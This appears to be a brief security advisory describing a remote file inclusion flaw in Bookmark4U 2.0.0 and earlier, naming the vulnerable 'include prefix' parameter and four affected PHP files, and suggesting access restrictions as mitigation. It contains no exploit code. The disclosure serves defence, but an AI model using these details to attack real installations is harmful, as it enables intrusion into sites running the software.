Selfar2002

**Name of the Vulnerable Software and Affected Versions** Bookmark4U versions 2.0.0 and earlier **Description** A remote file inclusion issue allows remote attackers to include arbitrary PHP files via the `include prefix` parameter in several PHP files, including (1) inc/dbase.php, (2) inc/config.php, (3) inc/common.php, and (4) inc/function.php. However, it has been reported that the inc directory is protected by a .htaccess file, which limits the applicability of this issue to certain environments or configurations. **Recommendations** For Bookmark4U versions 2.0.0 and earlier, consider restricting access to the `include prefix` parameter in the affected PHP files until a patch is available. As a temporary workaround, restrict access to the inc directory by reinforcing the .htaccess file protection or applying alternative access control measures to minimize the risk of exploitation.